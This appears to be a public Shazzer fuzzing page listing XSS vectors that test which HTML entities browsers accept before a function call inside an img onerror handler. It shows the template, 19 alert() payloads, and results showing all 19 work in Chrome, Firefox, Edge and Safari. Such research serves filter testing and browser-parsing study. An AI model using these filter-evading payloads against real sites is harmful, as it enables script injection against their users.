Shazzer logo

Entities allowed before function calls

Chrome logo 19
Firefox logo 19
Edge logo 19
Safari logo 19

This vector uses Shazzer's new features to check which entities are allowed before a function call using images. The results are a bit inconsistent yet because I currently wait for page load.

hackvertor
Created byhackvertor
Created Jul 2, 2024
Updated May 27, 2025

Tweet
Detecting browser...
CategoryEntity Parsing
VisibilityPublic
TypeXSS
CharsetUTF-8
$[data1] placeholderhtml_entities
Template used:
<img src=data: onerror="$[data1]log('html($[data1])')">

Sample payloads

<img src=data: onerror="&emsp13;alert('&#38;emsp13;')">
<img src=data: onerror="&emsp14;alert('&#38;emsp14;')">
<img src=data: onerror="&emsp;alert('&#38;emsp;')">
<img src=data: onerror="&ensp;alert('&#38;ensp;')">
<img src=data: onerror="&excl;alert('&#38;excl;')">
<img src=data: onerror="&hairsp;alert('&#38;hairsp;')">
<img src=data: onerror="&MediumSpace;alert('&#38;MediumSpace;')">
<img src=data: onerror="&nbsp;alert('&#38;nbsp;')">
<img src=data: onerror="&NewLine;alert('&#38;NewLine;')">
<img src=data: onerror="&NonBreakingSpace;alert('&#38;NonBreakingSpace;')">
<img src=data: onerror="&numsp;alert('&#38;numsp;')">
<img src=data: onerror="&plus;alert('&#38;plus;')">
<img src=data: onerror="&puncsp;alert('&#38;puncsp;')">
<img src=data: onerror="&semi;alert('&#38;semi;')">
<img src=data: onerror="&Tab;alert('&#38;Tab;')">
<img src=data: onerror="&ThickSpace;alert('&#38;ThickSpace;')">
<img src=data: onerror="&ThinSpace;alert('&#38;ThinSpace;')">
<img src=data: onerror="&thinsp;alert('&#38;thinsp;')">
<img src=data: onerror="&VeryThinSpace;alert('&#38;VeryThinSpace;')">

Fuzz results

Chrome logo
Chrome 144.0.0.0 desktop Windows NT 10.0
Updated31 Jan 2026
Found 19 results
Loading...
Chrome logo
Chrome 143.0.0.0 desktop macOS 10.15.7older version
Updated28 Jan 2026
Found 19 results
Loading...
Firefox logo
Firefox 147.0 desktop Linux
Updated1 Feb 2026
Found 19 results
Loading...
Firefox logo
Firefox 127.0 desktop macOS 10.15older version
Updated2 Jul 2024
Found 19 results
Loading...
Edge logo
Microsoft Edge 144.0.0.0 desktop Windows NT 10.0
Updated31 Jan 2026
Found 19 results
Loading...
Safari logo
Safari 18.0 desktop macOS 10.15.7
Updated2 Jul 2024
Found 19 results
Loading...